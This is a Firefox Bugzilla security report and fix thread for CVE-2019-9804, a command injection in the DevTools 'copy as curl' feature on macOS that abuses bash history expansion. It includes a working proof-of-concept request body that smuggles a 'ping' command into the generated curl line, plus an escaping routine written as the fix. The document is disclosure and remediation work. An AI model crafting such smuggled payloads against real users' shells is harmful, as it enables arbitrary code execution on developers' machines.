Closed Bug 1518026 (CVE-2019-9804) Opened 6 years ago Closed 6 years ago

RCE via "copy as curl" on mac

Categories

(DevTools :: Netmonitor, defect)

defect
Not set
normal

Tracking

(firefox-esr60 wontfix, firefox64 wontfix, firefox65 wontfix, firefox66 verified)

VERIFIED FIXED
Firefox 66
Tracking Status
firefox-esr60 --- wontfix
firefox64 --- wontfix
firefox65 --- wontfix
firefox66 --- verified

People

(Reporter: watashiwaher, Assigned: bgrins)

References

Details

(4 keywords, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+])

Attachments

(2 files)

Attached file curl.zip
VULNERABILITY DETAILS
Copy-pasting curl requests from Firefox can produce RCE on MacOS.

For example, we have the following JS code:
fetch('https://google.com', {'body':'\'!ls:q:gs|ls|;ping 8.8.8.8;|', method:'POST'})

If we copy it as curl we get the following bash command:
curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'!ls:q:gs|ls|;ping 8.8.8.8;|'

The interesting part is here:
$'\'!ls:q:gs|ls|;ping 8.8.8.8;|'

It calls the following command:
ping 8.8.8.8

But how?
The problem is that Mac uses an old bash which lacks some updates, and the current Mac version of bash has a problem with bash history expansions.

Our bash command will actually be interpreted in an interesting way if one of our previous commands contained 'ls'. So we will have the following request:
curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'';ping 8.8.8.8;''

The interesting part is here:
$'\'';ping 8.8.8.8;''

So you see that here our string has been transformed into executable bash code.


WHAT HAPPENED
First of all, when I found this, I asked the bash team to fix it, but they told me that it is not a vulnerability at all, so there is no CVE, that it is fixed in newer bash (it is true), and that they won't fix it for old versions.
Okay, I sent this information to Apple, and they fixed it... But I was slow and didn't check their fix. Later I checked the fix, and the fix was strange... They fixed the Safari inspector. So it looks like Apple actually doesn't think that it is a problem in Bash, as I understand it.
So I am sending the report to the Firefox team.


VERSION
Works only in MacOS in any version of Firefox.


REPRODUCTION CASE
I attached an archive with a video showcase and an HTML file.
Flags: sec-bounty?
Flags: needinfo?(watashiwaher)
Flags: needinfo?(watashiwaher)
Thanks for this report.

Does this also work in Chrome's devtools, and did you report to them (if so, can you provide the URL)? Do you know if there is a (public or private) URL for the safari/mac "fix"?

Honza, are you the right person to look at this?
Component: Security → Netmonitor
Flags: needinfo?(watashiwaher)
Flags: needinfo?(odvarko)
Product: Firefox → DevTools
"Does this also work in Chrome's devtools, and did you report to them"
Yes, it works, but I made the report yesterday for both Firefox and Chrome. So it is not public yet.

"Do you know if there is a (public or private) URL for the safari/mac "fix"?"
For Safari:
https://support.apple.com/en-us/HT208324

WebKit Web Inspector
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters.
CVE-2017-7161: Mitin Svyat

I looked at the fix (sorry for being so late). In Safari the interesting part transforms into:
$'\'\041ls:q:gs|ls|;ping 8.8.8.8;|'
Flags: needinfo?(watashiwaher)
(In reply to potatoe from comment #2)
> "Does this also work in Chrome's devtools, and did you report to them"
> Yes it works, but I made report yesterday for both: Firefox and Chrome. So
> it is not public yet.

OK, can you provide the link for completeness? We may be able to coordinate with Chrome, though if the fix for Safari is already public it might not matter very much anymore...
Here is a link (but it is private now).
https://bugs.chromium.org/p/chromium/issues/detail?id=919356
Status: UNCONFIRMED → NEW
Ever confirmed: true

I'm assuming this was the fix in Web Inspector: https://github.com/WebKit/webkit/commit/5736bda9ad07609ef386e2d5a7f5308c17b98586.

I can't find any reference to a commit from https://support.apple.com/en-us/HT208324, or a commit with the CVE ID.

Scanning our netmonitor code for "copy as curl", this looks like the relevant function: https://searchfox.org/mozilla-central/rev/b29663c6c9c61b0bf29e8add490cbd6bad293a67/devtools/client/shared/curl.js#348

I've ported over the WebInspector fix in attachment 9036477 [details]

Group: firefox-core-security → core-security-release
Status: NEW → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → Firefox 66
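The escaping approach referred to above, written out as an added example (it is not Firefox's curl.js or the WebKit commit): a POSIX-shell quoting routine for a "copy as curl" body that, inside ANSI-C $'...' quoting, emits "!" as the octal escape \041 so a bash that still applies history expansion inside $'...' never sees a literal "!". The `escapeBang` switch, the `hasBareHistoryTrigger` check and the helper names are assumptions made for this example; the request body is the one from the report.

```javascript
// Added example, not Firefox's curl.js: quote a request body for a POSIX shell
// the way a "copy as curl" feature must. Inside ANSI-C $'...' quoting, "!" is
// emitted as octal \041 so that a bash which still runs history expansion inside
// $'...' (the bug described in this report) never sees a literal "!".

function escapeNonPrintable(ch) {
  const code = ch.charCodeAt(0);
  if (code < 256) {
    // Always two hex digits so the next character cannot extend the escape.
    return "\\x" + code.toString(16).padStart(2, "0");
  }
  return "\\u" + code.toString(16).padStart(4, "0");
}

// escapeBang=false reproduces the pre-fix output shown in the report; the
// default reproduces the fixed output (the "\041" form quoted from Safari).
function quoteForPosix(str, { escapeBang = true } = {}) {
  if (!/[^\x20-\x7E]|'/.test(str)) {
    // Plain single quotes: bash performs no expansion of any kind inside them.
    return "'" + str + "'";
  }
  let body = str
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/\n/g, "\\n")
    .replace(/\r/g, "\\r");
  if (escapeBang) {
    body = body.replace(/!/g, "\\041");
  }
  body = body.replace(/[^\x20-\x7E]/g, escapeNonPrintable);
  return "$'" + body + "'";
}

// Defensive check for generated command lines: a bare "!" inside $'...' is a
// history-expansion trigger on affected shells and should never be emitted.
function hasBareHistoryTrigger(arg) {
  return arg.startsWith("$'") && arg.includes("!");
}

// The request body from the report, used here as a constructed test input.
const REPORTED_BODY = "'!ls:q:gs|ls|;ping 8.8.8.8;|";

console.log(quoteForPosix(REPORTED_BODY, { escapeBang: false })); // $'\'!ls:q:gs|ls|;ping 8.8.8.8;|'
console.log(quoteForPosix(REPORTED_BODY));                        // $'\'\041ls:q:gs|ls|;ping 8.8.8.8;|'
```

A body without a single quote or non-printable characters stays in plain single quotes, where no history expansion applies, so only the $'...' branch needs the extra escape.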

Too late for Fx65 in light of tomorrow's RC gtb. Let's let this ride the trains with 66.

Assignee: nobody → bgrinstead
Flags: in-testsuite+
Flags: needinfo?(odvarko)
Flags: sec-bounty? → sec-bounty+
Flags: qe-verify+
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]]

I have managed to reproduce the issue mentioned in comment 0 using Firefox 65.0.1 (BuildId:20190211233335).

This issue is verified fixed using Firefox 66.0b9 (BuildId:20190218131312) on macOS 10.12.6

Status: RESOLVED → VERIFIED
Flags: qe-verify+

Daniel, do you think we should uplift this to ESR for the 60.6 release?

Flags: needinfo?(dveditz)

I don't feel strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?

Flags: needinfo?(dveditz)

(In reply to Daniel Veditz [:dveditz] from comment #13)

I don't feel strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?

That's a good point. Given that this is DevTools + OSX only, I'm leaning towards not taking the resources required to get this uplifted and tested onto 60.

Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]] → [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+]
Alias: CVE-2019-9804

Is the report to Bash in a public report somewhere? I'd like to link to it.

Flags: needinfo?(watashiwaher)

Seems like noooo.

Flags: needinfo?(watashiwaher)
Group: core-security-release